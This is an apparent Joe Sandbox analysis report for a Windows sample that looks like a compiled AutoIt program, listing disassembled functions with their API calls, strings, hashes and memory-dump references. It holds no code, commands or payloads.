Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e4b06c74d0f9e9da2869f782b1a850e8493f68ace8d1a14970d3a60cac3a9d
Instruction ID: 3af97089dfc12f49c6489e995e9afcfa6a2a5df15365a2cf8e4d5fa5e09f0988
Opcode Fuzzy Hash: 61e4b06c74d0f9e9da2869f782b1a850e8493f68ace8d1a14970d3a60cac3a9d
Instruction Fuzzy Hash: 9D715930900549EFCF188F99CC49EBEBF79FF89310F148159F955AA291D730AA51CBA8

Function 0066B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00F556E8), ref: 0066B3EB
IsWindowEnabled.USER32(00F556E8), ref: 0066B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0066B4DB
SendMessageW.USER32(00F556E8,000000B0,?,?), ref: 0066B512
IsDlgButtonChecked.USER32(?,?), ref: 0066B54F
GetWindowLongW.USER32(00F556E8,000000EC), ref: 0066B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0066B589

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: e3afe14c297604f21266a663d8443bad9c365b07df1623cb2ac9133b3364936a
Instruction ID: 75374bb6b19af6f1b449fdfd4df1a3f5a97b8a0be092597355472a304240dcfd
Opcode Fuzzy Hash: e3afe14c297604f21266a663d8443bad9c365b07df1623cb2ac9133b3364936a
Instruction Fuzzy Hash: F8716C34604214EFDB20DF54D894FFA7BABEF0A300F146059E956E73A6CB72A981CB50

Function 0065F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0065F448
_memset.LIBCMT ref: 0065F511
ShellExecuteExW.SHELL32(?), ref: 0065F556

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

Part of subcall function 005FFC86: _wcscpy.LIBCMT ref: 005FFCA9

GetProcessId.KERNEL32(00000000), ref: 0065F5CD
CloseHandle.KERNEL32(00000000), ref: 0065F5FC

Strings

@, xrefs: 0065F525

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 87ea3770831573021571e4fcdbb377dc9d38451186bdde2f836cafb062271186
Instruction ID: 0b11ea5dbce8f350b3d3b4c628293dd50e590b558d5c16f17acf92fb20b49687
Opcode Fuzzy Hash: 87ea3770831573021571e4fcdbb377dc9d38451186bdde2f836cafb062271186
Instruction Fuzzy Hash: C5619075A0061A9FCF18EF65C4859AEBBF6FF48310F148069E895AB361DB30AD45CB90

Function 00640F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00640F8C
GetKeyboardState.USER32(?), ref: 00640FA1
SetKeyboardState.USER32(?), ref: 00641002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00641030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0064104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00641095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 006410B8

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a53eb3582151f289331839a772b0854842d8aaf00fa0a90819a0cd6ec69f59b8
Instruction ID: 5ffb02b1af116df4580184dfecdb049fbc8826d32fe6f71378d02f2e59151116
Opcode Fuzzy Hash: a53eb3582151f289331839a772b0854842d8aaf00fa0a90819a0cd6ec69f59b8
Instruction Fuzzy Hash: A951F1A05047D53DFB3243348C05BFABEAB6B07704F088589E2D98A9C2C6E8ECC9D751

Function 00640D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00640DA5
GetKeyboardState.USER32(?), ref: 00640DBA
SetKeyboardState.USER32(?), ref: 00640E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00640E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00640E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00640EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00640EC9

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6c8c131458f40f1ad0e55d6e89918fad8a45aa3e1c6f8210c8ef58b9094d4f2a
Instruction ID: 2fa030a85877d8270977c47b318bf8bedca26e074644598af500f2a9984d829e
Opcode Fuzzy Hash: 6c8c131458f40f1ad0e55d6e89918fad8a45aa3e1c6f8210c8ef58b9094d4f2a
Instruction Fuzzy Hash: 4851D7A09447E57DFB3247748C55BFA7EAB5F06300F08488DE2D48A9C2D3A5EC98E750

Function 006455FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0064560A
_wcsncpy.LIBCMT ref: 0064563F
_wcsncpy.LIBCMT ref: 00645671
_wcsncpy.LIBCMT ref: 006456A4
_wcsncpy.LIBCMT ref: 006456E6
_wcsncpy.LIBCMT ref: 00645720
_wcsncpy.LIBCMT ref: 0064574F

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: d11880602535a4639e1ba3fb12e9cdefef0d9d2bbaf0faba15537c4b4225e852
Instruction ID: 59593218cc9795c7d2ef28c707f160273f35c7bca98c9d9e497c27cba07110f7
Opcode Fuzzy Hash: d11880602535a4639e1ba3fb12e9cdefef0d9d2bbaf0faba15537c4b4225e852
Instruction Fuzzy Hash: 8E41D865C5021876CB55EBF48C469CFB7BE9F04310F50446AE505E3262FB34A345C7EA

Function 0063D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0063D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0063D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0063D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0063D69D

Strings

DllGetClassObject, xrefs: 0063D610
,,g, xrefs: 0063D578

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,g$DllGetClassObject
API String ID: 753597075-3601260016
Opcode ID: 06890224564b6eb20db4ae7299d0da92f529a9105be37ec5ac0945189b7900cb
Instruction ID: e7dc050278f6c2d433785fb8241641b330c62cfa414cc4da9a461fc9151ca033
Opcode Fuzzy Hash: 06890224564b6eb20db4ae7299d0da92f529a9105be37ec5ac0945189b7900cb
Instruction Fuzzy Hash: 1C417BB1600204EFDB05CF64E885A9ABBBAEF46314F1581ADFD099F205D7B1DA44CBE0

Function 00643671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0064466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00643697,?), ref: 0064468B

Part of subcall function 0064466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00643697,?), ref: 006446A4

lstrcmpiW.KERNEL32(?,?), ref: 006436B7
_wcscmp.LIBCMT ref: 006436D3
MoveFileW.KERNEL32(?,?), ref: 006436EB
_wcscat.LIBCMT ref: 00643733
SHFileOperationW.SHELL32(?), ref: 0064379F

Strings

\*.*, xrefs: 0064372D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 18912c21b49f53c9acf61b1596fcb262376633510c4b1921abd5c7aec9f77198
Instruction ID: c6c2ba7aca24222d8111271ded038b38a666367d4ae4995b9f3eee5d6cf5edd3
Opcode Fuzzy Hash: 18912c21b49f53c9acf61b1596fcb262376633510c4b1921abd5c7aec9f77198
Instruction Fuzzy Hash: 1241B171108345AEC795EF60C446ADF77EAAF88380F00082EF099C3391EB34D689C756

Function 00667291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006672AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00667351
IsMenu.USER32(?), ref: 00667369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006673B1
DrawMenuBar.USER32 ref: 006673C4

Strings

0, xrefs: 0066729E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 4cbd03ab80210e98f001a163f68802c8aa7c57f26f4db82c2e08883148fb3b5b
Instruction ID: fefdca6381d953f4e13f7ebaf71a60a7607387b7e7b5ea2d4f4b41199130d27c
Opcode Fuzzy Hash: 4cbd03ab80210e98f001a163f68802c8aa7c57f26f4db82c2e08883148fb3b5b
Instruction Fuzzy Hash: 0E412575A04209EFDB20DF50D884AEABBBAFB09319F149429FD16A7350D730AD50DF60

Function 00660FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00660FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00660FFE
FreeLibrary.KERNEL32(00000000), ref: 006610B5

Part of subcall function 00660FA5: RegCloseKey.ADVAPI32(?), ref: 0066101B
Part of subcall function 00660FA5: FreeLibrary.KERNEL32(?), ref: 0066106D
Part of subcall function 00660FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00661090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00661058

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 1eb50130fbda188d4fd5d8fcd96c6376cf0cdf8e3934fbb2018e95080c61bf01
Instruction ID: acb6fd79e3d042beba47ccc59a1b023c75750640d1c1eac0c2f0a32d0f502069
Opcode Fuzzy Hash: 1eb50130fbda188d4fd5d8fcd96c6376cf0cdf8e3934fbb2018e95080c61bf01
Instruction Fuzzy Hash: 88310D71901109BFEF15DF90EC89EFFB7BDEF09340F04016AE901A6251EA759E859AA0

Function 006662CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006662EC
GetWindowLongW.USER32(00F556E8,000000F0), ref: 0066631F
GetWindowLongW.USER32(00F556E8,000000F0), ref: 00666354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00666386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006663B0
GetWindowLongW.USER32(00000000,000000F0), ref: 006663C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006663DB

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 847f1d816c9367f9ed2a882334a2cdf28f6e1dffd64f48079537be060df3bb74
Instruction ID: c2b940e0235f8ec7d77de1cf7c39ab1f451cbb4c9c70094da99fa3c1ef6a5460
Opcode Fuzzy Hash: 847f1d816c9367f9ed2a882334a2cdf28f6e1dffd64f48079537be060df3bb74
Instruction Fuzzy Hash: 5D31C231644150AFDB21DF19EC84F9937E6BB4A714F1921A8F512EB3B2CB71AC409B51

Function 0063DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0063DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0063DB54
SysAllocString.OLEAUT32(00000000), ref: 0063DB57
SysAllocString.OLEAUT32(?), ref: 0063DB75
SysFreeString.OLEAUT32(?), ref: 0063DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 0063DBA3
SysAllocString.OLEAUT32(?), ref: 0063DBB1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: eced6712ae23483b69622d6bb7ab7a07b1ac9802ea47a2026e46422e13b183f9
Instruction ID: 91903629500d0fe24d5ce97820a7ad1f2479ef00c5796d844f71be6d1383ff08
Opcode Fuzzy Hash: eced6712ae23483b69622d6bb7ab7a07b1ac9802ea47a2026e46422e13b183f9
Instruction Fuzzy Hash: BF2183B6604219AFDF10DFA8EC84CBBB3EEEB09360F018565F915DB291DA709C4187A4

Function 00656173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00657D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00657DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006561C6
WSAGetLastError.WSOCK32(00000000), ref: 006561D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0065620E
connect.WSOCK32(00000000,?,00000010), ref: 00656217
WSAGetLastError.WSOCK32 ref: 00656221
closesocket.WSOCK32(00000000), ref: 0065624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00656263

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 284cd3c7dc86b233a675d43bab80e041a2f3014e60543b68f46340e08d667e2f
Instruction ID: 0a67a036397b4e8470d42f242e47c02bf681f4a63dfa98b291bc89ecbea8a630
Opcode Fuzzy Hash: 284cd3c7dc86b233a675d43bab80e041a2f3014e60543b68f46340e08d667e2f
Instruction Fuzzy Hash: 52319071600108ABDF10AF24DC89BBA7BAAEB45721F444069FD45A7291CBB0AD08CBA1

Function 0063F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0063F671
__wcsnicmp.LIBCMT ref: 0063F692
__wcsnicmp.LIBCMT ref: 0063F6AC

Strings

#OnAutoItStartRegister, xrefs: 0063F6A6
#requireadmin, xrefs: 0063F68C
#notrayicon, xrefs: 0063F669

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 6604af1afd2088b526f4198392a8db8ac32ac17718db4d3ef73f80c7a0ceec3b
Instruction ID: c24b91c59df60b52023bbc79347ef1e3c2a4e1e4774ce32ec2efc78e84661e54
Opcode Fuzzy Hash: 6604af1afd2088b526f4198392a8db8ac32ac17718db4d3ef73f80c7a0ceec3b
Instruction Fuzzy Hash: DA210772A4462266D224A734AC13EEB73ABEF56350F10443EF58686291EB919D42C2D9

Function 0063DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0063DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0063DC2F
SysAllocString.OLEAUT32(00000000), ref: 0063DC32
SysAllocString.OLEAUT32 ref: 0063DC53
SysFreeString.OLEAUT32 ref: 0063DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 0063DC76
SysAllocString.OLEAUT32(?), ref: 0063DC84

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2c553152dbd5c98fd63a5d917531203df23ec454cb9f9ecfe49081295a64a598
Instruction ID: f48be2644e6393dc4a5b48fa6d4dd020e654351e87f495cff95aa9599541edba
Opcode Fuzzy Hash: 2c553152dbd5c98fd63a5d917531203df23ec454cb9f9ecfe49081295a64a598
Instruction Fuzzy Hash: CA214175604204AFDB10DFB8EC88DAB77EEEB09360F109165F915CB2A1DAB0EC41C7A4

Function 006675CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005E1D73
Part of subcall function 005E1D35: GetStockObject.GDI32(00000011), ref: 005E1D87
Part of subcall function 005E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 005E1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00667632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0066763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0066764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00667659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00667665

Strings

Msctls_Progress32, xrefs: 00667603

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 23d9ea4ae7ff1ced03c2aa0d157f199c59f77a7c9c788d1703d0c4ac21add499
Instruction ID: 00f5ed819455cd699524f0eef9bedebebaee91a48bf0538fcd8beb0892d9826f
Opcode Fuzzy Hash: 23d9ea4ae7ff1ced03c2aa0d157f199c59f77a7c9c788d1703d0c4ac21add499
Instruction Fuzzy Hash: 9911B2B2110219BFEF159F64CC85EE77F6EEF08798F014114FA05A20A0CA72AC21DBA4

Function 00609AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00609AE6

Part of subcall function 00603187: EncodePointer.KERNEL32(00000000), ref: 0060318A
Part of subcall function 00603187: __initp_misc_winsig.LIBCMT ref: 006031A5
Part of subcall function 00603187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00609EA0
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00609EB4
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00609EC7
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00609EDA
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00609EED
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00609F00
Part of subcall function 00603187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00609F13
